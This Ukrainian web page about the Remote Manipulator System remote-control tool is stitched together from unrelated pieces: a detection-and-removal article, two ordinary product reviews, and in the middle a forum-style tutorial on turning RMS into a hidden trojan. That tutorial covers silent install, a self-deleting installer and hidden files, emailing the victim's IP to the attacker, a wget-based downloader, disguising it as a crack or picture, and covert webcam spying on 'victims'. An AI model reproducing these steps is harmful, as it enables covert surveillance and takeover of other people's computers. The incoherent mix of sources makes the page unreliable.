RMS Віддалений доступ. Що таке Remote Manipulator System? Як користуватись, як відправити жертві? Як видалити Remote Manipulator System? Налаштувати rms віддалений доступ

Програма Remote Manipulator System (RMS)дозволяє « переглядати віддалений екран і керувати клавіатурою та мишею так, ніби віддалений комп'ютер знаходиться безпосередньо перед вами». Завдяки їй та програмам з подібним функціоналом, хакери швидко формують ботнети. На хакерських форумах у величезному достатку пропозиції щодо продажу віддалених доступів до комп'ютерів жертв за дуже доступними цінами. Як написали на одному популярному ресурсі « Подібні атаки використовуються не тільки для видобутку вже звичного профіту (паролі, гроші), але й для продажу людям з надлишком якихось гормонів – доступи до комп'ютерів дівчат, які часто перебувають перед комп'ютером у роздягненому вигляді».

У цій статті ми розглянемо, як виявити та видалити Remote Manipulator Systemякщо її встановили таємно від вас.

У головному вікні інтерфейсу COVERT, у верхньому правому куті, є мережевий монітор, який видає список всіх активних з'єднань комп'ютера. Якщо у цьому списку з'явився процес rutserv.exe, отже ведеться спостереження з допомогою програми RMS. Якщо в активних з'єднаннях з мережею немає цього процесу, тоді слід перевірити програми, які очікують з'єднання за таймером або за командою. Досить часто програми віддаленого доступу та шпигуни знаходяться саме там. Щоб побачити очікування підключення програми, натисніть лівою кнопкою миші на заголовок стовпця «Додаток» або в контекстному меню виберіть пункт «З'єднання», як показано на скріншоті нижче.

Функція “ Служби системи” дозволить вам побачити, що віддалений доступ до вашого комп'ютера забезпечує служба RManService.

У списку процесів системи, що видає функція “ Процеси системи”, виявляємо три процеси RMS: rutserv.exe, rfusclient.exe, rfusclient.

Таємне спостереження за вами виявлено. Як видалити RMS із комп'ютера?
Ми з'ясували, що віддалений доступ забезпечує служба RManService, встановлена ​​в ОС. Потрібно її видалити, щоб унеможливити. У моніторі системних служб викликаємо контекстне меню правою кнопкою при наведенні на ім'я служби та вибираємо пункт "Видалити", як показано на скріншоті.

Бувають ситуації, коли потрібно залишити на комп'ютері програму віддаленого спостереження, але хочете, щоб ваші дії залишалися невидимими для RMS. У цьому випадку додайте в "Базу загроз" маскувальника ім'я файлу rutserv.exe. Під час запуску програми COVERT автоматично аналізується мережеві з'єднання і, якщо серед них є занесені до бази загроз, вони блокуються. Комп'ютер, на якому стоятиме модуль керування RMS - клієнтська програма, призначення якої в підключенні та спостереженні за вашим комп'ютером, отримає повідомлення про збій. Вона не зможе в момент вашої роботи всередині захищеної платформи маскування встановити повторне з'єднання.

Усі ваші дії будуть приховані від віддаленого перегляду. Як тільки ви закриєте програму маскування, RMS відновить віддалений доступ з вашим комп'ютером і бачитиме на вашому комп'ютері все, що ви бачите.

Перевірте, чи стежать за вами за допомогою RMS.

RMS Віддалений доступ

Не кожен антивірус із цим впорається ось що небезпечно.

Remote Manipulator System - програма для віддаленого керування та контролю комп'ютерів у мережі.

Ідеально підходить для роботи через Інтернет. Доступно керування віддаленим робочим столом, передача файлів, інвентаризація парку ПК та багато іншого. Повна сумісність із Windows 7 та графічною оболонкою «Aero». Доступна безкоштовна версія програми.

Більше не потрібно конфігурувати мережеві екрани та маршрутизатори.

NAT – більше не перешкода. Завдяки функції «Internet-ID» тепер можна налаштувати віддалений доступ до комп'ютера через Інтернет без IP адреси без спеціальних навичок системного адміністратора.

Remote Manipulator System дозволяє отримати повний контроль над віддаленим комп'ютером.

У тому числі передавати на віддалений комп'ютер зображення з Web-камери та звук.

Доступні режими з'єднання:

* Управління та спостереження

* Файловий менеджер

* Текстовий чат

* Управління харчуванням

* Диспетчер завдань

* З'єднання за протоколом RDP

* Диспетчер пристроїв

* Підключення до командного рядка

* Запис екрану за розкладом

* Просте текстове повідомлення

* Підтримка кількох моніторів

* Віддалена установка

* Віддалений реєстр.

* Функція «Виконати»

* Підключення до web-камери.

Працює скрізь.

Продукт може працювати у будь-якій конфігурації мережі. NAT та мережні екрани – не перешкода.

Сховане встановлення прихованого складання програми серверної частини Remote Manipulator System + шпигунських утиліт зі збирання та відправлення паролів та адрес.

Що це означає? Це означає, що через Інтернет цей комп'ютер був повністю доступний зловмисникам і вони могли робити з ним все, що завгодно (копіювати файли до себе на віддалений комп'ютер, видаляти та змінювати їх, бачити екран у режимі реального часу та робити записи екрана за розкладом, слухати звук з мікрофона - тобто підслуховувати, включати Web-камеру - тобто підглядати і багато чого іншого...).

Вся справа в тому, що готуючи приховану установку прихованого сервера, зловмисники підготувалися до "замітання слідів" і впровадили деінсталятор, який приховано видаляє сервер з комп'ютера користувача (іноді це потрібно зробити для підключення до іншого комп'ютера, також із прихованим RMS-сервером по Internet ID - Складання видаляють на одному комп'ютері і підключаються до іншого - два по одному ID працювати не можуть, завжди виникає конфлікт). Але це деталі, важливо, що в папці windows/system32 лежить прихований файл de.exe, який при запуску видаляє з комп'ютера прихований RMS-сервер і теж видаляється. Можна його знайти та запустити, він сам вирішить проблему.

Як же могла статися прихована (коли власник комп'ютера навіть і не підозрює ні про що!) установка прихованого (майже ніяк не проявляє свою присутність і свою активність на комп'ютері) сервера Remote Manipulator System?

Ось що я дізнався, вивчаючи Інтернет.

Зазвичай зловмисники використовують два методи. Або користувачеві підсовується сам прихований інсталятор прихованого RMS (це файл з розширенням EXE і розміром від 2 до 3 мгб) або прихований завантажувач цього файлу з Інтернету (файл з розширенням EXE і розміром близько 500 кбт), тоді при запуску цього файлу відбувається приховане завантаження інсталятора з Інтернету, а потім прихована установка сервера. Переважна більшість антивірусних програм при цьому скромно МОВЧАТЬ... (що, принципово, цілком зрозуміло - адже вірусів, як таких, у складання НІ, вам тільки встановлюють на комп'ютер ЛЕГАЛЬНУ програму приховано і для роботи в прихованому режимі).

Імена цих виконуваних файлів можуть бути БУДЬ-ЯКИМИ. Після запуску та відпрацювання вони самовидаляються з комп'ютера. "Впарюють" їх довірливим людям під різними приводами.

Наприклад, архів, що саморозпаковується під виглядом Прайс Ліста дуже престижних товарів, що розпродаються з величезними знижками --- жінки, бажаючи переглянути повний список товарів на розпродажі, зазвичай "ведуться" без праці. Мій колега, до речі сказати, ймовірно придбав прихований інсталятор під виглядом пропозиції послуг постачальником супутніх продуктів потенційним партнером по бізнесу. А траплялися й випадки, коли прихований RMS встановлював на комп'ютер користувача викликаний за оголошенням "комп'ютерний майстер". Слідкуйте, що роблять із Вашим комп'ютером сторонні люди, а найкраще – нікого до нього не допускайте.

Всім доброго часу доби!

Сьогодні ми з вами будемо робити приховане складання Remote Manipulator System (аналог Radmin, Teamviewer)
Одразу попереджаю, що зібрати досить складно, особливо новачкам.

Я постараюся пояснювати все покроково та доступною мовою.
RMS (як і Radmin, TeamViewer і т.д.) виконує одну й ту саму функцію – віддалене адміністрування (тобто управління) комп'ютером

Що вміє RMS?
Тут перелічені всі його функції:
-Управління та спостереження
-Файловий менеджер
-Текстовий чат
-Диспетчер завдань
-Підключення за допомогою Internet-ID! (Так само як у TeamViewer)
-Диспетчер пристроїв
-Підключення до командного рядка
-Запис екрану за розкладом
-Просте текстове повідомлення
-Підтримка кількох моніторів
-Видалена установка
-Wake-On-Lan
-Видалений реєстр.
-Функція «Виконати»
-Підключення до web-камери.
-Самовидалення
-Інтеграція з фаєрволлом

Почну з перерахування того, що являє собою збірка:
1. Повністю прихована установка (екран не моргає на відміну Радміна)
2. Після запуску установник самовидаляється
3. Всі файли складання приховані/системні, жертві буде складніше щось помітити
4. Вам на пошту додатково надсилається IP, але він нам не знадобиться, швидше за все, оскільки ми будемо використовувати Internet-ID
5. Вага буде ~2,8мб
6. Дане складання частково палиться антивірусами (як зробити, що б не палилася - пишіть у контакти)

Отже, почнемо збирати:

I. Налаштування RMS сервера

Насамперед, завантажуємо архів
Увага! На архів стоїть пароль

Пароль на архів:
-
Відкриваємо папку R, запускаємо файл server.exe, встановлюємо. Після завершення встановлення програма запуститься сама:

Перед нами з'являється віконце Безпеки:

Натискаємо Змінити/Встановити – вводимо пароль, допустимо 12345678rms
Переходимо у вкладку Аутентифікація, повинна стояти галочка – Рівень 3
Далі натискаємо ОК! Все, віконце зникає.

Наступним кроком для нас буде налаштування сервера
У правому нижньому кутку клацаємо правою кнопкою по синьому значку
Налаштування Інтернет-ID з'єднання
Натискаємо Отримати новий ID, з'являється щось схоже:

Наступним кроком для нас буде друга частина налаштування сервера:
відкриваємо Пуск, Програми, Remote Manipulator System – Server, Settings for R-Server

Тут буде два кроки, перший ми вже пройшли (безпека).
2. Режим запуску – Автоматичний
3. Налаштування, прибрати всі галочки, поставити тільки на "заборонити закриття RMS", також у вкладці Логування галочка має бути знято.
4. Ліцензійний ключ – введіть:
-

5. Закриваємо Налаштування

Відкриваємо директорію, куди встановився сервер, та виділяємо такі файли:

Копіюємо, створюємо десь папку, туди все вставляємо.
Саме в цій папці у нас відбуватиметься все найцікавіше, далі я цю папку називатиму “Нова Папка”

Продовжуємо працювати. Тепер нам потрібно експортувати наші налаштування з паролями та всіма налаштуваннями.

Для цього нам потрібно зробити таке:

Для ХР, WIN+R: regedit
Для 7, просто в рядку «знайти програми та файли» вводимо regedit, і Ок
Ідемо сюди: HKEY_LOCAL_MACHINE/SYSTEM/ далі експортуємо Remote Manipulator System

І вказуємо шлях нашу створену папку, (ім'я файлу задайте - sets) в яку ми копіювали наші файли сервера, ось що у Вас має вийти:

Сам по собі файл sets.reg – це файл налаштувань, там зберігаються всі Ваші налаштування, якщо Ви хочете щось змінити, Вам потрібно замінювати лише цей файл, зробивши всі попередні кроки.

ІІ. Редагування установника

Ну от перейшли до головної частини.

Виділяємо install.bat, правою кнопкою – змінити
(Перша половина коду служить для того, щоб на комп'ютері жертви видалити раніше встановлений Радмін, Rem_Cam, і якщо стояв раніше те і RMS, нам не треба щоб хтось теж мав доступ до комп'ютера крім нас).

Тут два простих кроки:
1. Створюємо пошту на Яндексі (!):
2. Будь ласка, тут не тупіть, щоб не було потім питань!
Знаходимо це майже наприкінці і редагуємо ось це під себе:

###LOGIN### - це ТІЛЬКИ логін, БЕЗ додавання @yandex.ru, ###PASSWORD### - 12345678, тут ясно - вказуємо свої дані з реєстрації в Яндексі.
Закриваємо, зберігаємо.

Виділяємо в Новій Папці файл setup.exe правою кнопкою - відкрити архів.
Виділяємо все що є в Новій Папці (крім setup.exe зрозуміло) і перетягуємо в віконце, що відкрилося. Успішно додали файли до архіву.

У результаті у Вас має вийти ось це:

Копіюємо кудись наш файл setup.exe.
Решту можна видалити з папки.

ІІІ. Завершення

Отже, відкриваємо папку R, встановлюємо файл Viewer.exe, через нього ми підключатимемося до «жертви» по Internet-ID.

Важливо!
Якщо Ви збираєтеся свою збірку кидати декільком «жертвам» і одразу, то з Інтернет-ІД будуть проблеми, оскільки він присвоюється одній збірці одного комп'ютера.
Якщо Ви збираєтеся розповсюджувати прихований rms масово, то в такому випадку потрібно до кожної «жертви» підключатися через IP

Як я особисто раджу використати цю збірку.
Ви кидаєте її одній жертві, вона його встановлює. Далі Ви можете по тому Internet-ID (який ви копіювали вище) підключатися. Зробили все, що Вам потрібно на комп'ютері жертви і далі видаляєте складання з комп'ютера жертви
Для цього потрібно:
Підключаєтеся до жертви та вибираєте підключення «Запуск програм»-Огляд - у жертви заходьте в директорію windows\system32 там знаходите файл de.exe, вибираєте. (поставте галочку «прихований запуск»)

Файл de.exe входить до складу збирання. Це файл, що самовидаляється, який повністю видаляє з комп'ютера жертви вашу збірку прихованого рмс

Після запуску цього файлу у жертви краще перевірити чи відійшла збірка (для цього просто намагаємося підключитися знову), якщо не можемо, це означає, що збірка успішно видалася і ми можемо використовувати нашу збірку на іншій жертві так само як і на першій.
Це робиться для того, щоб не було конфліктів між двома комп'ютерами з одним Internet-ID.

Великою перевагою цієї збірки буде те, що підключення буде стовідсотковим! Навіть якщо жертва має динамічний IP (або за NAT'ом).

Також ця збірка інтегрується з фаєрволом. У налаштуваннях можна включити економію трафіку, в цьому випадку все працювати буде швидше і менше трафіку їсть.
Ще не менше порадувало наявність вбудованого сканера серверів RMS. Якщо ви втратили свою жертву з динамічним IP, Ви можете її легко знайти, просканувавши діапазон IP в якому вона знаходиться (наприклад 92.72.0.0-92.72.255.255)

Загалом – пробуйте, пишіть відгуки, кидайте ДЯКУЮ

За бажанням, створення даунлоадера

Що з себе, власне, являє цей даунлоадер і навіщо він потрібен?
Це.exe файл, який відразу після запуску самовидаляється, завантажує файл і встановлює, після запуску самовидаляється, не залишивши при цьому жодних слідів

Тож почнемо!

Все, що потрібно, знаходиться в папці Downloader

Отже, нам потрібна реєстрація сервера на Яндексі.
У Вас вже має бути пошта на Яндексі, куди приходять IP. З цього облікового запису ми зареєструємо наш сервер, куди заливатимемо нашу збірку.

Для цього:
1. Зайдіть на свій обліковий запис на Яндексі
2. Переходимо за посиланням http://narоd.yаndеx.ru/
3. Натискаємо «Створити сайт» (сайт нам не потрібен, лише файл-менеджер)
4. Коли наш сайт створений заходимо у файл-менеджер, ****.narod2.yandex.ru/filemanager/
5. Вибираємо "Завантажити файл", завантажимо нашу RMS збірку
6. Після того як завантажиться файл, там має бути така сіренька кнопочка «посилання», натискаємо, копіюємо.

Припустимо, ми вже маємо сервер на Яндексі, на якому лежить наш файл. Добре, йдемо далі.
Далі розпаковуємо наш завантажений архів, відкриваємо папку link, файл winupd.bat – змінити.
###LINK### - адреса на файл
###DOWNLOADED"FILENAME### - назва файлу

Batch file: відкриваємо наш батник - winupd.bat
Save us: залишаємо як є
Решту ставимо як на картинці, повинно вийти так:
Вкладка Options:

У вкладці Include додаємо файл wget.exe
Вкладка Include:

Наступним кроком для нас буде поміщення файлу winupd.exe в оболонку, яка його дропатиме і після цього самовидаляться.
Клік по файлу load.exe, відкрити архів, перетягуємо файл winupd.exe у файл load.exe

Всі! Наш даунлоадер готовий!

Для непалевності і зручності, можна впарити комусь наш файл під виглядом кряка, патча, картинки та ін. (Відразу кажу, неможливо створити установник з розширенням. краще використовувати СІ)

Зміни в Express RMS:

Спрощено налаштування (логін та пароль вводите в текстовику)
- Після перезавантаження повторно надсилає IP
- В установнику тепер лише 6 файлів:
- Установка проходить набагато швидше

Прошу не звертатися до особи з проханням дати ключ на якому обмеження, з усіх питань, а також Новим версіям збірок пишіть мені на контакти (внизу)

прихований rms 5.5 5.4, прихований рмс віддалене адміністрування, прихований рмс з відправкою ід і пароль на пошту, приховане адміністрування, remote manipulator system 5.5 rms віддалений доступ, віддалений доступ, прихований перегляд веб камери, прихована веб камера

Останні кілька років програми для віддаленого керування комп'ютерами все більше набувають популярності як для корпоративного використання, так і у домашніх користувачів. Системний адміністратор навіть малого підприємства вже не може уявити життя без програми віддаленого адміністрування.

Що таке програма для віддаленого адміністрування? Як випливає з назви, це інструмент, що дозволяє отримати повний доступ до віддаленого ПК на відстані. Програма перенаправляє на Ваш комп'ютер картинку з віддаленого екрану та транслює натискання клавіш клавіатури та переміщення курсору миші з Вашого ПК на віддалений. Це базова функціональність практично для всіх рішень у галузі віддаленого адміністрування. Але дуже часто цього виявляється мало, потрібні додаткові функції. Саме наявність різної додаткової функціональності та відрізняє один від одного софт цієї категорії. У цьому огляді ми розглянемо вітчизняну розробку компанії «TektonIT» – продукт «Remote Manipulator System».

Remote Manipulator System складається із двох частин. Серверна частина (RMan-Server) встановлюється на комп'ютери користувачів, яких потрібно отримати доступ. Клієнтська частина (RMan-Viewer) встановлюється на комп'ютер адміністратора, з якого здійснюватиметься віддалене керування.

Viewer - Server

Завантажити дистрибутив можна з офіційного сайту компанії виробника, розмір дистрибутива близько 10 МБ. Програма сумісна з Windows 7.

Установка Remote Manipulator System

Докладно розглянемо процес встановлення серверної та клієнтської частини. Для програм дистанційного адміністрування установка - це найважливіша частина функціональності.

Для роботи програми необхідно встановити два модулі. Модуль RMan-Viewer на комп'ютері адміністратора та модуль RMan-Server на комп'ютери користувачів. Доступно кілька способів встановлення серверної частини.

Перший спосіб - ручне встановлення сервера з MSI-дистрибутиву. Під час встановлення програма автоматично інтегрується у стандартний брандмауер, щоб не було проблем із доступом до сервера із зовнішньої мережі. Потім з'явиться вікно налаштувань програми, де необхідно встановити пароль для доступу до цього комп'ютера через клієнтську програму RMan-Viewer. Можна встановити інші додаткові параметри безпеки, встановити IP-фільтр, налаштувати доступ до певних режимів з'єднання.

Другий спосіб – віддалена установка серверної частини безпосередньо з робочого місця адміністратора. До речі, доступно кілька видів віддаленої установки - це інсталяція за допомогою вбудованої спеціалізованої утиліти та автоматизована віддалена установка в домені через групові політики безпеки Active Directory. Останній варіант особливо зручний для організацій із великим парком ПК.

Для початку потрібно встановити RMan-Viewer - клієнтський модуль, що дозволяє здійснювати контроль над серверними модулями.

Головне вікно RMan-Viewer

До списку з'єднань потрібно додати нове з'єднання, вказавши в його налаштуваннях IP-адресу або ім'я віддаленого комп'ютера.

Нове з'єднання

Для масового додавання RMan-Server-ів до списку з'єднань можна скористатися вбудованим пошуком.

Пошук RMan-Server-ів

Виберіть у списку з'єднань цікаве, або групу комп'ютерів, що цікавлять, і через контекстне меню запустіть утиліту «Віддалена установка».

Віддалена установка

У цьому вікні потрібно вказати MSI дистрибутив RMan-Server, який потрібно встановити. Також, вказавши шлях до дистрибутива, запускаємо MSI-конфігуратор, за допомогою якого можна легко попередньо налаштувати дистрибутив сервера, що встановлюється, наприклад, задати пароль доступу.

MSI-конфігуратор

За допомогою вбудованої утиліти віддаленої установки можна не тільки інсталювати Remote Manipulator на віддалений комп'ютер, але й деінсталювати його, запускати та зупиняти.

Функціональність

Програма надає широкий вибір режимів з'єднання.

• Дистанційне керування комп'ютером.
• Віддалене спостереження.
• Файловий менеджер.
• Дистанційний диспетчер завдань.
• Дистанційний диспетчер пристроїв.
• Віддалений реєстр.
• Термінал – доступ до командного рядка (аналог системної утиліти «Командний рядок»).
• Управління живленням.
• Віддалений запуск програм.
• Текстовий чат.
• Підключення до віддаленої web-камери та мікрофону.
• Надсилання простого текстового повідомлення.
• З'єднання протоколу RDP.
• Записувати робочий стіл сервера за розкладом.

Основний плюс, що виникає з такого різноманіття варіантів підключення, - можливість виконувати різні налаштування, не відволікаючи користувача від роботи. Наприклад, можна редагувати реєстр або переглядати список встановленого обладнання та програм, але на екрані сервера не відбуватиметься жодних змін.

Зупинимося на розгляді деяких режимів докладніше.

Віддалене спостереження та управління

Цей режим є найбільш затребуваним і часто використовується. Цей режим дозволяє підключитися до віддаленого комп'ютера та керувати ним, якби Ви сиділи безпосередньо перед його екраном. Суб'єктивно продукт показав досить високу швидкість роботи в локальній мережі – розробники не перебільшили, навівши в описі продукту фразу «Швидкість роботи на такому рівні, що Ви не відчуєте різницю між локальним та віддаленим комп'ютером».

Видаленний робочий стіл

Вгорі вікна з віддаленим екраном знаходиться спливаюча панель інструментів, з набором функцій, що найчастіше використовуються.

Панель інструментів

Можна заблокувати пристрої введення та екран віддаленого комп'ютера, щоб користувач не бачив маніпуляції під час сеансу керування; вибрати монітор (якщо їх дещо на віддаленій машині); переносити інформацію через буфер обміну.

Також, у вікні з віддаленим екраном, можна відкрити панель розширеної настройки.

Додаткові параметри

Файловий менеджер

Дуже часто виникає необхідність передати файл з одного комп'ютера на інший, а стандартний загальний доступ до файлів, що цікавлять, не налаштований, або не доступний. На допомогу приходить модуль передачі файлів.

Файловий менеджер

Інтерфейс цього модуля нагадує відомий файловий менеджер «Total Commander», тому більшості досвідчених користувачів розібратися з даним модулем не важко. Доступні всі найпоширеніші файлові операції. Файли можна копіювати, переміщувати, видаляти, перейменовувати.

Файловий менеджер повністю підтримує операції перетягування "Drag&Drop", сумісний із системним провідником. Є зручна система закладок для швидкого переходу по директоріям, що найчастіше використовуються.

Багатьом буде корисна функція т.н. докачування файлів.

Віддалена веб-камера

Цей модуль нещодавно з'явився в продукті і практично не має аналогів серед програм для віддаленого доступу. Цей режим дозволяє підключатися до пристроїв відеозахоплення (веб-камера, мікрофон, TV-тюнер і т.д.). Т. о. Remote Manipulator дозволяє спостерігати не лише за тим, що відбувається на екрані віддаленого комп'ютера, а й за тим, що відбувається біля нього.

Віддалена веб-камера

Цей режим має ряд налаштувань, що дозволяють вибрати потрібний пристрій захоплення та якість зображення.

Налаштування віддаленої веб-камери

Під час сеансу підключення до веб-камери на віддаленому комп'ютері відображається банер, який повідомляє користувача про те, що за ним ведеться відеоспостереження. Все-таки Remote Manipulator це програма для адміністрування, а не для шпигунства.

Диспетчер завдань

Цей режим призначений для керування вікнами, процесами та службами віддаленого ПК. Простіше кажучи, якщо потрібно запустити якусь службу або завершити небажаний процес - віддалений диспетчер завдань підійде дуже доречно.

Диспетчер завдань

Текстовий чат та надсилання простого текстового повідомлення

Не забуті у програмі та засоби комунікації з віддаленими користувачами.

Розрахований на багато користувачів чат з можливістю розширеного форматування тексту і відправкою вкладень.

Текстовий чат

І надсилання простого текстового повідомлення.

Просте повідомлення

Інвентаризація

Режим «Видалений диспетчер пристроїв» реалізує функціональність, що дозволяє здійснювати повний перепис програмного та апаратного забезпечення парку машин. Інформація групується у зручні HTML- або XML-звіти.

Диспетчер пристроїв

Віддалений редактор реєстру

Досить новий режим, хоча давно має деякі аналоги. Незамінний, коли потрібно виправити щось у віддаленому системному реєстрі, але не хочеться відволікати користувача.

Віддалений редактор реєстру

Інтерфейс дуже подібний до системного Regedit, тому розібратися в цьому модулі можна миттєво. До речі, редактори параметрів також зроблено на належному рівні.

Зручною особливістю є наявність функції імпорту/експорту ключів та параметрів у стандартний файл.REG.

Інші режими

Режим "Запис екрана" дозволяє стежити за діями користувача повністю автономно від RMan-Viewer. Т. е. адміністратор, за допомогою зручного інтерфейсу користувача, може задати розклад, який, якщо перекласти на людську мову, виглядає так - «Робити знімок кожні 2 хвилини, по робочих днях з 8 ранку до 5 вечора». У будь-який момент адміністратор може завантажити з сервера файл, в якому зберігаються знімки екрана за якийсь конкретний день і подивитися, за допомогою спеціального програвача, що відбувалося на екрані віддаленого комп'ютера, наприклад, о 16:00. Є можливість захисту файлів із записами від видалення на сервері.

Отже, кому це може знадобитися? Насамперед адміністраторам і керівникам, оскільки це дає можливість контролювати роботу самих користувачів, переглянувши денний звіт з кадрами раз на 1 хвилину, можна отримати точну картину того, що відбувалося на екрані віддаленого комп'ютера протягом усього робочого дня. Таким чином можна серйозно оптимізувати роботу співробітників, навіть коли адміністратора немає на робочому місці.

Режим "Термінал" дозволяє отримати повноцінний доступ до командного рядка віддаленої системи. Введення команд та запуск програм у вікні «Термінал» проводиться так само, як у командному рядку системної утиліти «cmd». До речі, на відміну від деяких інших програм, в RMan цей режим повністю сумісний з кирилицею.

Є вбудований RDP-клієнт. RDP – утиліта для керування робочим столом віддаленого комп'ютера. Використовується стандартний протокол віддаленого робочого столу, розроблений компанією Microsoft.

Режим «Керування живленням» дозволяє вимикати та перезавантажувати віддалений комп'ютер, завершувати та блокувати сеанс поточного користувача віддалено.

Безпека

Як запевняє розробник, Remote Manipulator System спроектований з урахуванням сучасних стандартів і вимог безпеки на всіх рівнях. Всі дані, що надсилаються через мережу, шифруються, цю функцію не можна вимкнути. Для аутентифікації клієнта використовується алгоритм шифрування відкритим ключем RSA із довжиною ключа 2048 біт. Дані шифруються надійним AES алгоритмом з 256-бітним ключем. Є можливість настроювати алгоритми шифрування та довжину ключа. Усі криптографічні функції реалізовані у сертифікованих системних бібліотеках Microsoft.

RMan підтримує дві системи авторизації: захист паролем та захист на базі Active Directory. Налаштування RMan-Server зберігаються в реєстрі Windows, доступ до них обмежений всім, крім користувачів з правами адміністратора. Також є можливість поставити пароль на доступ до параметрів сервера навіть для адміністраторів.

Є досить гнучка система розмежування мережного доступу до сервера: прив'язка до одного конкретного мережного інтерфейсу, заборона доступу за IP-адресою або діапазоном IP-адрес, захист від підбору пароля та DoS-атак.

IP-фільтр

Робота через NAT та у складній топології мережі

Функція «Зворотне з'єднання» (Callback) дозволяє серверу виступати ініціатором мережного з'єднання. Завдяки цьому механізму можна здійснювати з'єднання навіть із сервером, який знаходиться за мережевим екраном або якщо не відома його IP-адреса.

Зворотне з'єднання

Функція «З'єднання через…» дає можливість з'єднуватися через ланцюжок RMan-Server-ів (вибудовувати т. н. каскадне з'єднання), якщо немає доступу, що маршрутизується, в потрібну підсіть безпосередньо.

Каскадне з'єднання

Деяка додаткова функціональність

Якщо описувати кожну функцію кожного режиму програми, це вже не формат огляду, а формат невеликої книги. Тому просто коротко перерахуємо список деяких потрібних додаткових функцій програми.

• Повсюдна інтеграція з технологією «Drag&Drop» (перетягни та кинь). Файли та папки можна перетягувати звичним для Windows способом – безпосередньо на вікно з віддаленим робочим столом та навпаки.
• Підтримка мультимоніторних систем.
• Трансляція звуку із віддаленої машини на локальну.
• Під час сеансу адміністрування можна увімкнути блокування екрана та клавіатури віддаленого комп'ютера.
• Повна підтримка графічної оболонки "Aero". При з'єднанні оболонка не відключається, хоча є налаштування, що дозволяє її вимкнути.
• Можливість прикріплювати файли до повідомлень у текстовому чаті.
• "Інтелектуальна докачка" файлів через файловий менеджер.
• "Wake-On-LAN" - віддалене включення комп'ютера.
• Карта мережі. Список з'єднань можна переглядати як карти топології мережі.
• Захист налаштувань RMan-Server-а паролем.
• Система журналу подій на сервері.

Підсумки

Продукт, безумовно, вартий уваги і підійде різним категоріям користувачів. Я особливо підкреслив дійсно високу швидкість передачі картинки в режимі віддаленого управління, неконфліктність з драйверами пристроїв, широку функціональність, високу динаміку розвитку програми і впровадження нових функцій.

13 вересня 2013 року, Однокрилов Володимир 2

Сьогодні ми протестуємо рішення для керування віддаленим робочим столом Remote Manipulator System 5.5. Комплект складається з кількох утиліт, включаючи модулі "Клієнт" та "Хост". З їх допомогою можна налагодити з'єднання з віддаленим комп'ютером та дистанційно керувати роботою всіх його функцій. На додаток до цього в RMS 5.5 є чат, відеозв'язок, можливість редагувати реєстр та багато іншого. Подробиці читайте у нашому огляді.

Відеоогляд Remote Manipulator System 5.5

Склад програмного комплексу Remote Manipulator System 5.5

З розвитком Інтернету, локальних ЛОМ та підвищенням швидкості з'єднань все частіше потрібно звертатися до віддалених комп'ютерів - неважливо, чи системний ви адміністратор у компанії з великим парком ПК, чи просто хочете допомогти другові, який живе на іншому кінці міста. У будь-якому випадку програми управління віддаленими робочими столами не втрачають популярності, а їх розробники все розширюють функціонал. І сьогодні ми розглянемо одне з таких рішень – версії 5.5 на момент тестування.

Зображення коробки RMS 5.5

До складу цього програмного пакета входять такі модулі:

• RMS Хост- після встановлення на віддаленому хості дозволяє підключатися до нього для керування та налаштування. Сервер не має активних вікон, крім меню параметрів.

Налаштування RMS Хост 5.5

• RMS Клієнт- програма для підключення до RMS Хост.

Інтерфейс RMS Клієнт 5.5

• RMS Агент- пакет RMS, який не вимагає установки та прав адміністратора для запуску. Програма відразу підключається до серверів для генерації ID та пароля, виводячи відповідне віконце, а в іншому мало чим відрізняється від стандартного хоста.

Стартове вікно RMS Агент 5.5

• Mini Internet-ID сервер- сервер, який розміщується локально та дозволяє використовувати Internet-ID без звернення до серверів TektonIT.

Інформація про RMS Mini Internet-ID 5.5

Додатково доступний у клієнті програми так званий MSI Конфігуратор- це покроковий майстер зі створення трьох видів дистрибутивів (звичайний MSI-пакет, дистрибутив автоматичної установки та RMS-Агент) із пакета RMS Хост, що завантажується з офіційного сайту.

Вибір типу дистрибутива у MSI Конфігуратор від RMS 5.5

Вибравши тип пакета, можна задати додаткові опції – навіть є можливість надіслати email-повідомлення з ID встановленого клієнта.

Налаштування дистрибутивів у RMS 5.5

Якщо якесь із обов'язкових полів не заповнене, майстер поверне вас на потрібний крок, а потім пакет буде сформований і можна буде вибрати місце його збереження.

Вибір місця збереження модифікованого дистрибутива RMS 5.5

Загалом зручно, особливо якщо потрібно працювати з кількома комп'ютерами і не на всіх у користувача є повноцінні права доступу. До того ж у RMS Агентможна за допомогою MSI Конфігураторвнести логотип та назву своєї компанії.

Враження від роботи з Remote Manipulator System 5.5

По суті, це ПЗ працює за принципом "сервер-клієнт", як і безліч інших подібних програм, і справляється з цим досить добре. Дозволяється не тільки підключатися та керувати комп'ютером/спостерігати за діями користувача, але також використовувати безліч корисних інструментів:

• Передача файлів. Досягається це за допомогою здвоєного вікна файлового менеджера, в якому можна копіювати дані як на хост, так і на комп'ютер.

Передача файлів у RMS 5.5

• Управління електроживленням. По суті, ви отримуєте доступ до можливостей вимкнення та перезавантаження ПК, включаючи функціонал Wake on LAN.

Управління електроживленням у RMS 5.5

• Диспетчер завдань- моніторинг та управління процесами на віддаленому ПК у реальному часі.

Диспетчер завдань у RMS 5.5

• Термінал- Простий термінал для командного рядка ОС на керованому комп'ютері.

Термінал у RMS 5.5

• Запуск програмдозволяє відкривати виконувані файли та документи від імені певного облікового запису, у тому числі непомітно для користувача.

Запуск програм у RMS 5.5

• Інвентаризація- Доступ до відомостей про систему.

Інвентаризація у RMS 5.5

• RDP- підключення до віддаленого ПК за протоколом Microsoft RDP.
• Чат- Мінімалістський текстовий месенджер для спілкування з користувачами підключених комп'ютерів.

Чат у RMS 5.5

• Запис екрану- Журнал відеозахоплення екрану.

Журнал записів екрана RMS 5.5

• Повідомлення. Ця опція дозволяє виводити задане повідомлення на віддаленому ПК в окремому вікні, наприклад, можна сповістити користувача про технічні роботи.

Створення повідомлення у RMS 5.5

• Віддалена камерадозволяє отримувати відеопотік з віддаленого ПК, причому незважаючи на спеціалізацію камер, в налаштуваннях можна вибрати будь-який доступний на віддаленому комп'ютері пристрій захоплення.

Налаштування дистанційної камери в RMS 5.5

• Віддалений реєстр. Редактор реєстру віддаленого ПК є дуже корисним інструментом для системного адміністратора.

Віддалений реєстр у RMS 5.5

• Аудіо та відеочатдозволяє, як і "Чат", спілкуватися з користувачем віддаленого ПК тільки цього разу використовуючи мікрофон і/або веб-камеру. Правда, інші пристрої захоплення модуль також бачить, тому для нормальної роботи завжди варто в налаштуваннях вибрати самі веб-камери.

Запуск аудіо/відеочата в RMS 5.5

